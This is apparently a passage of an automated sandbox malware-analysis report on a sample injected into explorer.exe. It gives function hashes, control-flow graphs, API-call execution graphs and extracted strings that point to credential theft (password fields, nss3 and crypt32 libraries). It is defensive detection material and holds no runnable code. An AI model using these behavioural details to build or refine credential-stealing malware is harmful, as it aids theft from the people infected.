                                                                                                                                                                                                                                                                                                control_flow_graph 281 598aee2-598af1a 282 598af1c-598af3e call 598deb2 281->282 283 598af44-598af65 socket 281->283 282->283
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: socket
                                                                                                                                                                                                                                                                                                • String ID: sock
                                                                                                                                                                                                                                                                                                • API String ID: 98920635-2415254727
                                                                                                                                                                                                                                                                                                • Opcode ID: b5e9fd95fd77712679bc77e5ed075a02168c95ac9186b881f1bc913899d51f34
                                                                                                                                                                                                                                                                                                • Instruction ID: be56a3457b9b161b74e1b921efad8d66c9a6ab4f6c66090be5342041dd3564c2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5e9fd95fd77712679bc77e5ed075a02168c95ac9186b881f1bc913899d51f34
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B50171715186088FCB44EF1CD088B10BBE0EB5C321F1681BEDA0DDB266C2B4C9858B85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598D4B2 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 286 598d4b2-598d4e6 287 598d4e9-598d4ed 286->287 288 598d569-598d572 287->288 289 598d4ef-598d4f2 287->289 288->287 290 598d578-598d581 288->290 289->288 291 598d4f4-598d55f call 598f342 call 598f312 call 598e4f2 289->291 292 598d5ba-598d5d6 290->292 293 598d583-598d58a 290->293 291->288 305 598d561-598d567 SleepEx 291->305 295 598d58c-598d58d 293->295 296 598d59f-598d5a8 293->296 299 598d593-598d59d 295->299 296->292 300 598d5aa-598d5b1 296->300 299->296 299->299 300->292 302 598d5b3-598d5b4 300->302 302->292 305->288
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                • Opcode ID: afa6d07527846fbb1122b3884d939f329e186663819791bdf139398d76f10f5b
                                                                                                                                                                                                                                                                                                • Instruction ID: 652bb68b3f61e67eb4dcedac6649115877f9e5af23d453801ea2ab8b5d8a55b8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afa6d07527846fbb1122b3884d939f329e186663819791bdf139398d76f10f5b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB31F73021CB4CCFCB29EF18E8855F973E0FB95710F00065FD48B8B159DA70A9468AD2
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0598D4AB Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 306 598d4ab-598d4ac 307 598d50d-598d514 306->307 308 598d4ae-598d4b1 306->308 309 598d51f-598d55f call 598e4f2 307->309 310 598d51a call 598f312 307->310 308->307 313 598d569-598d572 309->313 314 598d561-598d567 SleepEx 309->314 310->309 315 598d578-598d581 313->315 316 598d4e9-598d4ed 313->316 314->313 317 598d5ba-598d5d6 315->317 318 598d583-598d58a 315->318 316->313 319 598d4ef-598d4f2 316->319 320 598d58c-598d58d 318->320 321 598d59f-598d5a8 318->321 319->313 322 598d4f4-598d51a call 598f342 call 598f312 319->322 323 598d593-598d59d 320->323 321->317 324 598d5aa-598d5b1 321->324 322->309 323->321 323->323 324->317 326 598d5b3-598d5b4 324->326 326->317
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6b769b170b1a8b9684fe2bf6667aca27b47b5c3d285ca0adb756b6e6030b14e7
                                                                                                                                                                                                                                                                                                • Instruction ID: f473ec87c13dcdde3d2c8ff22db48692afe85eae801911653fdfffb7760ca2d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b769b170b1a8b9684fe2bf6667aca27b47b5c3d285ca0adb756b6e6030b14e7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1421E43121CB488FDB39EF1CE8855FC73D1F784714F40066FD4CA8729ADA74A8468686
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 05986692 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.786557599.0000000005970000.00000040.80000000.00040000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_5970000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9fb2356148101aa9420ae4aad7d72730ff3cfb8bd9b520b9a3e7d6278ce6f5f3
                                                                                                                                                                                                                                                                                                • Instruction ID: b1a8e9383b2da2991b65a473e365a61db220e59c4242aa2fed60655225ba9812
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fb2356148101aa9420ae4aad7d72730ff3cfb8bd9b520b9a3e7d6278ce6f5f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6F08130618A484BCB88EF2CD48566AB3E0EBE8300F440A3EA84AC7264EA35D5818752
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                Function 06DBF290 Relevance: 11.7, Strings: 9, Instructions: 406COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .dll$32.d$K;y&$M$S$el32$kern$ll$user
                                                                                                                                                                                                                                                                                                • API String ID: 0-2102913938
                                                                                                                                                                                                                                                                                                • Opcode ID: c967ba98aa6818e9a7e8a5f096327c9b61f3f12a1156fda78f7e771b66dbc61a
                                                                                                                                                                                                                                                                                                • Instruction ID: 03e8ef26ca3a665b28886d1f403a8e72a36563f1cb922a1d85dedef77eff2272
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c967ba98aa6818e9a7e8a5f096327c9b61f3f12a1156fda78f7e771b66dbc61a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3E17D70618A499FCB99EF38C884BEAF3E1FF98301F50462E906EC7244DF34A5508B95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DC39A2 Relevance: 56.5, Strings: 45, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                                                                                • API String ID: 0-3558027158
                                                                                                                                                                                                                                                                                                • Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                                                                                                                                                                                                                                                • Instruction ID: 9e82c83da41990ffad3a0ff8b23e1ea53ba722682053eea9deacfd57e547d849
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE914EF04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DC0E72 Relevance: 9.0, Strings: 7, Instructions: 292COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                                                                                                                • API String ID: 0-2058692283
                                                                                                                                                                                                                                                                                                • Opcode ID: 75c8884196013b17c768361e1995a5fa7aa5762a9df6beb0c95d7ae7f7b5ba93
                                                                                                                                                                                                                                                                                                • Instruction ID: 2afc10d6a686b1f7601e157e97b816bc28476e2dfdbdc13af29ae97012563cf2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75c8884196013b17c768361e1995a5fa7aa5762a9df6beb0c95d7ae7f7b5ba93
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB91AE70A1874C8BDB98EF68D8446EEB7F2FF98310F40462ED48AD7242DF7495458B89
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DBFC02 Relevance: 7.7, Strings: 6, Instructions: 164COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: U$b$d$k$n$o
                                                                                                                                                                                                                                                                                                • API String ID: 0-1739295752
                                                                                                                                                                                                                                                                                                • Opcode ID: c154e42e4e2377762541633edb31a1727a8ce2a1e2ea00f45db5444f4b9afd32
                                                                                                                                                                                                                                                                                                • Instruction ID: bf59531bb246426e8c31d091c1c2510bc84816524a113b9673d54818ebb75b0c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c154e42e4e2377762541633edb31a1727a8ce2a1e2ea00f45db5444f4b9afd32
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA516D30A14A0D9BCB98EFB4D8947EEB3B1FF54301F008629C42AD7251EF34A6558BD6
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DC11D7 Relevance: 6.5, Strings: 5, Instructions: 207COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .dll$cryp$dll$nss3$t32.
                                                                                                                                                                                                                                                                                                • API String ID: 0-1478216402
                                                                                                                                                                                                                                                                                                • Opcode ID: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
                                                                                                                                                                                                                                                                                                • Instruction ID: e49f79fa2d57532eda4462cb7bacf6c2db42e1f56ba9b6f94f04343a363d1d25
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed6325d0aff5055827ada73a612b01221855a1ddf8e9fb96a19483f3db3cb0e3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39616D30A18B1E8FDB99EF68C4487DAB3E1FF18318F40862E981AC7295DB74D554CB85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DC11D2 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .dll$cryp$dll$nss3$t32.
                                                                                                                                                                                                                                                                                                • API String ID: 0-1478216402
                                                                                                                                                                                                                                                                                                • Opcode ID: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
                                                                                                                                                                                                                                                                                                • Instruction ID: c170e3aac653ba33a5ee363047f999956e47eb101bb7892f113654eaf689d7e9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6cf1db3b2cf44addb77c6c3145e795bac18999a885706ce33a387fa702dbb64
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED616C30A18B1E8FDB99EF68C4487DAB3E1FF18318F40862E981AC7295DB749554CB85
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DBE7DE Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                                                                                                                • API String ID: 0-1970020201
                                                                                                                                                                                                                                                                                                • Opcode ID: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
                                                                                                                                                                                                                                                                                                • Instruction ID: 1944f53e23f0ef18592c4aaa632ce1590d37f42571718afd2c7920589bd5e7a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7312c44d1f0932142c55cb86490c7abd72f0b28439fd4d223315acbb67dd2d0a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39615D70914B4D8BCB94EFA4C4446DEB7F1FF58301F404A2EA89BE7254EF3095519B8A
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DBE7E2 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                                                                                                                • API String ID: 0-1970020201
                                                                                                                                                                                                                                                                                                • Opcode ID: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
                                                                                                                                                                                                                                                                                                • Instruction ID: 5e1fdfe0f3fc86a9279256f8eacfd787a9d2461c228ab1897b29878c9e8717c2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5615D70914B4D8BDB94EFA4C4446DEB7F1FF58301F404A2EA89BD7254EF3095419B8A
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DC1472 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: -Age$User$nt: $on.d$urlm
                                                                                                                                                                                                                                                                                                • API String ID: 0-1987325725
                                                                                                                                                                                                                                                                                                • Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                                                                                                                                                                                                                                                • Instruction ID: 6f30a3264b529d4a6eecb7897b14d19d91f94938949d637f0f249fa8741d7470
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9231D130A24A4D8BCB84EFA8D8842EEB7E1FF58215F40422ED45ED7240DE7486448B95
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 06DBF002 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.787590180.0000000006D90000.00000040.00000001.00040000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_6d90000_explorer.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: .dll$el32$h$kern
                                                                                                                                                                                                                                                                                                • API String ID: 0-4264704552
                                                                                                                                                                                                                                                                                                • Opcode ID: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
                                                                                                                                                                                                                                                                                                • Instruction ID: da4d4cf171f8ddceaa5385b29332dbdd0afc0fc180b34462ab9e74ff697f63cb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F415F70A18B498FDBE8DF29C8843EAB7E1FB98301F145A2E949AC3255DB70C545CB81
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                Execution Coverage:9.9%
                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:3.9%
                                                                                                                                                                                                                                                                                                Signature Coverage:2%
                                                                                                                                                                                                                                                                                                Total number of Nodes:791
                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:100
                                                                                                                                                                                                                                                                                                execution_graph 24659 1051e04 27 API calls _vswprintf_s 24609 50c85a NtDeleteFile 24650 111131b 13 API calls _vswprintf_s 24660 105aa16 48 API calls _vswprintf_s 24611 506447 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 24661 4fd2d9 NtClose LdrInitializeThunk 23689 4fb153 LdrLoadDll 24614 4f5450 LdrLoadDll NtClose LookupPrivilegeValueW LdrInitializeThunk 24652 112070d 35 API calls 24638 108002d 6 API calls 24615 50307c 10 API calls 23699 4f8d7f 28 API calls 23700 4fdc7e CreateThread RtlAllocateHeap LdrInitializeThunk LdrInitializeThunk 23703 50ca64 RtlFreeHeap 24641 4f816d NtAllocateVirtualMemory LdrInitializeThunk LdrInitializeThunk 24663 112022c 55 API calls 23705 50f513 RtlAllocateHeap RtlFreeHeap 24617 111bd54 12 API calls 24664 1059240 5 API calls _vswprintf_s 24618 4f57b9 23 API calls 23710 50521c CoInitialize 24619 4fe401 LdrInitializeThunk 24620 502c08 RtlFreeHeap 24621 506009 LdrLoadDll RtlFreeHeap 24622 50c80a NtReadFile 24653 1050b60 11 API calls 24643 50c93a NtAllocateVirtualMemory 23888 50553d 8 API calls 23889 4f9720 23890 4f9745 23889->23890 23891 4fb160 LdrLoadDll 23890->23891 23892 4f9778 23891->23892 23894 4f979d 23892->23894 23895 4fccf0 23892->23895 23896 4fcd1c 23895->23896 23897 4fcd3c 23896->23897 23902 50c620 23896->23902 23897->23894 23899 4fcd5f 23899->23897 23900 50c890 NtClose 23899->23900 23901 4fcd9a 23900->23901 23901->23894 23903 50c63c 23902->23903 23906 1099710 LdrInitializeThunk 23903->23906 23904 50c657 23904->23899 23906->23904 24605 4fa03e 11 API calls 24606 4f2136 NtAllocateVirtualMemory 24625 107c182 34 API calls 23682 5032d6 10 API calls 23683 50e3d7 RtlAllocateHeap 24626 107e180 34 API calls 24627 5044d8 8 API calls 24665 4f63c4 7 API calls 23686 50cb8d LookupPrivilegeValueW 23687 5002a7 8 API calls 24645 107e090 35 API calls 23691 4fea8a 7 API calls 24630 10835a1 33 API calls 23697 4fdde3 19 API calls 23698 4fa0e1 13 API calls 24667 4fdbfe 11 API calls 24668 4f83f9 9 API calls 24646 50b5ed CreateThread 24647 106a8c0 13 API calls _vswprintf_s 24671 4f5387 LdrLoadDll 23709 50099b 9 API calls 24672 4f7b80 9 API calls 23711 4feb9e 23712 4feb8f 23711->23712 23713 4feba3 23711->23713 23715 507370 23713->23715 23721 5074a2 23715->23721 23723 507384 23715->23723 23716 5074b5 23747 50c760 23716->23747 23717 507498 23744 50c860 23717->23744 23720 5074dc 23750 50e300 23720->23750 23721->23712 23723->23716 23723->23717 23723->23721 23724 507677 23727 50c890 NtClose 23724->23727 23725 50768d 23795 507090 23725->23795 23729 50767e 23727->23729 23729->23712 23730 5076a0 23730->23712 23731 507580 23732 5075e7 23731->23732 23734 50758f 23731->23734 23732->23724 23733 5075fa 23732->23733 23832 50c890 23733->23832 23735 507594 23734->23735 23736 5075c5 23734->23736 23737 5075ad 23734->23737 23735->23712 23736->23729 23763 506d10 23736->23763 23753 506ff0 23737->23753 23740 5075bb 23740->23712 23741 5075dd 23741->23712 23743 507666 23743->23712 23745 50c87c NtDeleteFile 23744->23745 23835 50d3d0 23744->23835 23745->23721 23748 50d3d0 23747->23748 23749 50c77c NtCreateFile 23748->23749 23749->23720 23751 5074e8 23750->23751 23837 50ca70 23750->23837 23751->23721 23751->23724 23751->23725 23751->23731 23754 50700c 23753->23754 23755 507034 23754->23755 23756 507048 23754->23756 23757 50c890 NtClose 23755->23757 23758 50c890 NtClose 23756->23758 23759 50703d 23757->23759 23760 507051 23758->23760 23759->23740 23840 50e420 RtlAllocateHeap 23760->23840 23762 50705c 23762->23740 23764 506d5b 23763->23764 23765 506d8e 23763->23765 23766 50c890 NtClose 23764->23766 23767 506daa 23765->23767 23771 506ed6 23765->23771 23768 506d7f 23766->23768 23769 506de1 23767->23769 23770 506dcc 23767->23770 23768->23741 23773 506de6 23769->23773 23774 506dfc 23769->23774 23772 50c890 NtClose 23770->23772 23775 50c890 NtClose 23771->23775 23776 506dd5 23772->23776 23777 50c890 NtClose 23773->23777 23782 506e01 23774->23782 23841 50e3e0 23774->23841 23778 506f36 23775->23778 23776->23741 23779 506def 23777->23779 23778->23741 23779->23741 23789 506e10 23782->23789 23844 50c810 23782->23844 23783 506e64 23784 506e82 23783->23784 23785 506e97 23783->23785 23786 50c890 NtClose 23784->23786 23787 50c890 NtClose 23785->23787 23786->23789 23788 506ea0 23787->23788 23790 506ecc 23788->23790 23847 50e100 23788->23847 23789->23741 23790->23741 23792 506eb7 23793 50e300 RtlFreeHeap 23792->23793 23794 506ec0 23793->23794 23794->23741 23796 5070ce 23795->23796 23797 5070d7 23796->23797 23798 5070ec 23796->23798 23799 50c890 NtClose 23797->23799 23800 507110 23798->23800 23801 50715a 23798->23801 23812 5070e0 23799->23812 23804 50c7c0 LdrInitializeThunk 23800->23804 23802 5071a0 23801->23802 23803 50715f 23801->23803 23808 5071b2 23802->23808 23811 507327 23802->23811 23807 50c810 NtReadFile 23803->23807 23803->23812 23805 507135 23804->23805 23806 50c890 NtClose 23805->23806 23806->23812 23809 50718a 23807->23809 23810 5071b7 23808->23810 23821 5071f2 23808->23821 23813 50c890 NtClose 23809->23813 23814 50c7c0 LdrInitializeThunk 23810->23814 23811->23812 23815 50c890 NtClose 23811->23815 23812->23730 23816 507193 23813->23816 23817 5071da 23814->23817 23819 507358 23815->23819 23816->23730 23818 50c890 NtClose 23817->23818 23822 5071e3 23818->23822 23819->23730 23820 5071f7 23820->23812 23823 50c7c0 LdrInitializeThunk 